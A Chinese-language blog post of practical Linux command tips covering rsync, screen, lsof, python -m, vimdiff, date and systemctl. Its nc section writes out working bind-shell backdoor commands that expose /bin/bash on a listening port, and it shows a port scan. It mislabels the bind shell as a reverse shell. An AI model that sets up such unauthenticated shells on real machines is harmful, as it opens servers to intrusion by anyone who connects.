這些傻白甜的Linux命令,不會有人教你!
Linux上的命令非常多,為了掌握它,很多同學耗盡了自己的腦細胞,憔悴了自己的容顏,結果記憶了一大堆垃圾命令,用過之后就忘了哈哈。
xjjdog在以前整理過一批最常用的Linux命令,更編寫了一篇長長的Linux教程文檔。可以說,只要掌握了這些,Linux的命令就可以玩的和轉了,就像哪吒的風火輪一樣。
但是本文,我將介紹另外幾個命令,會讓你的Linux技能更上一層樓。這幾個命令的應用場景,幾乎沒人會教你。
rsync
如果你使用過cp,那一定知道scp。cp的適用范圍是單機,而scp可以實現跨機器復制。比如:
scp -Crvp -l 1024 logs/ root@remoetserver:/opt/logs
其中,-C是壓縮的意思;-r是循環傳輸整個目錄;-p表示保留原文件的一些屬性;-l表示限制貸款(kb/s);-v表示顯示詳細進程。
但如果你傳輸的文件非常的大,比如每天上T的日志文件,你不可能每次都把這些文件傳輸一遍,所以增量備份會成為一個首要的需求;當然,如果在拷貝過程中,能夠排除一些文件,那是再好不過了。它們之間還有兩個小區別:rsync默認是只拷貝有變動的文件,scp是全量拷貝,所以rsync很適合做增量備份。另外,scp是加密傳輸,而rsync不是。
這種場景,rsync就派上用場了。例如:
rsync -prz --exclude 'bin' --bwlimit=1024 logs/ root@remoetserver:/opt/logs
同樣的,-r表示遞歸;-p表示保留屬性;-z表示開啟壓縮;--bwlimit表示帶寬限制;而--exclude就可以指定我們要忽略的文件。如果你想要看拷貝進度的話,可以加入--progress參數。
screen & tmux
如果你費了九牛二虎之力登錄了公司的服務器,結果發現只能打開一個黑漆漆的窗口。如果再開一個的話,就需要重復相同的過程。后者合上電腦,ssh就斷開了,是不是感覺很無助?
即使是Ctrl+z和fg配合,也只能讓某一個命令在后臺運行。
screen可以避免這些問題,很多Linux發行版中都預裝了。當然,tmux是更高級版本,但你可能沒有權限安裝它。
直接執行screen命令,就可以開啟一個新的screen session。下面演示一個普通的流程。
# 1 使用screen進入命令
screen vim /etc/hosts
# 2 在 screen 終端 下 按下 Ctrl+a d鍵,這將退出編輯窗口
# 3 顯示已創建的screen終端
screen -ls
# 4 連接 screen_id 為 14000 的 screen終端
screen -r 14000
lsof
在linux環境下,任何事物都以文件的形式存在,通過文件不僅僅可以訪問常規數據,還可以訪問網絡連接和硬件。lsof就是一個可以查看所有關聯文件的命令,非常好用。
默認的lsof會列出系統中所有的正在被使用的文件,這通常是巨大的。所以它提供了很多過濾條件。
比如-p 指定進程號;-u 指定用戶名;-i 列出所有的網絡鏈接。
常見的命令如下:
# 1. 列出進程123和456所對應的文件信息
lsof -p 123,456
# 2. 列出所有的tcp鏈接
lsof -i tcp
# 3. 查看占用了8080端口的進程信息
lsof -i :8080
python -m
python是個好工具,尤其是它內置了很多一句話的服務。
比如,你想要臨時在服務器上開啟一個HTTP服務,但又不想安裝Nginx或者Tomcat這么笨重的東西,那么就可以使用Python臨時開啟一個。
python3 -m http.server 9080
Serving HTTP on :: port 9080 (http://[::]:9080/)
這將在啟動命令行的目錄開啟一個HTTP服務。
如果你想要格式化一個json字符串,那么可以使用json.tool。
python -m json.tool
使用它,將非常方便的完成json格式化,再也不用訪問瀏覽器了。
vimdiff
很多人使用vim來編輯文件,但很少人知道vim也可以對比兩個文件。
相對于diff命令來說,vimdiff獲取的結果是彩色的。直接編輯兩個要對比的文件即可。
vim file1 file2
vim會盡力保證兩側文件的對齊。當你滾動一邊數據的時候,將會帶動另外一邊同時滾動。
- ]c 下一個差異點
- [c 上一個差異點
nc
netcat?這個工具,簡稱nc?,是Linux上一個非常強大的工具(當然也有windows版本)。由于它能力實在太強,有些公司甚至對他進行了隔離(quarantined)。比如rename?掉,或者給000的權限。因為它很容易可以在服務器上開一個后門(backdoor),并且極其方便。
nc的參數非常非常多,如果列出來,會讓你失去興趣,白白錯過了這么厲害的工具,也錯過了進局子的機會。我們還是以案例來說明,這款不到1MB的命令,為什么俘獲了xjjdog的芳心。
下面的命令,將在機器上開放5879端口。服務端:
# nc -l -vv -p 5879 -e /bin/bash
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::5879
Ncat: Listening on 0.0.0.0:5879
這個過程叫做反彈shell,遠程就可以使用nc命令連接,做一些事情。
客戶端:
# nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
在服務器上,執行下面兩個命令,這就構造了一個循環。
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l 5879 > /tmp/f
客戶端nc連接以后,竟然直接出現了命令行操作終端!
$ nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
[root@localhost~]#
你可能會說,我客戶端關掉之后,為什么服務端的命令也退出了?如果你想要服務端繼續監聽,可以加上參數-k。
如果你想要判斷服務器的tomcat端口是否開啟,不需要登陸到服務器上,然后再ps?一下看一下進程,或者使用netstat -antl看一下監聽的端口。
只需要簡單的打上ip和端口,它就能知道結果。
# nc -vvv baidu.com 443
Connection to baidu.com port 443 [tcp/https] succeeded!
當然,它也可以掃描主機的端口開放情況。不過對程序員來說用的不多。
nc -vzw 2 192.16.1.54 8888-9999
更多的關于nc的知識,可以參見這篇文章。
nc很強大,容易讓人蹲號子
將Unix時間戳變可讀
如果你獲取到一個Linux時間戳,那么你可能希望知道它到底是什么時間。
雖然有很多網絡工具可以幫助你做這些事,但它們太慢了。我們直接使用date命令就可以達到。
看下面。
date -d @1658054000 +'%Y-%m-%d %H:%M:%S'
你可以創建自己的常用命令把后面的替換了。對于macbook來說,不是d參數,而是r參數,效果是一樣的。
date -r 1658054000
Sun Jul 17 18:33:20 CST 2022
systemctl
關于systemd,我們在另外一篇文章中說明。這里補充一個好用的命令,可以看到當前服務器中都有哪些可以執行的服務。
systemctl -l -t service | less
End
以上就是我稍加補充的幾個Linux效率工具。從上圖的一個調查科可以看出,有太多的人在使用Linux的命令行。MacOS的很多指令已經和Linux趨同,所以這個范圍會更大一些。
掌握一些常用的Linux命令,可以讓你的工作完成的更快更迅速。而那些不常用的命令,只會吞噬你寶貴的時間。本文告訴你的,都是工作中的經驗之談,沒有書生氣,也沒有長篇大論的參數羅列。只談你最常用的,因為我懂你。
作者簡介:小姐姐味道 (xjjdog),一個不允許程序員走彎路的公眾號。聚焦基礎架構和Linux。十年架構,日百億流量,與你探討高并發世界,給你不一樣的味道。我的個人微信xjjdog0,歡迎添加好友,進一步交流。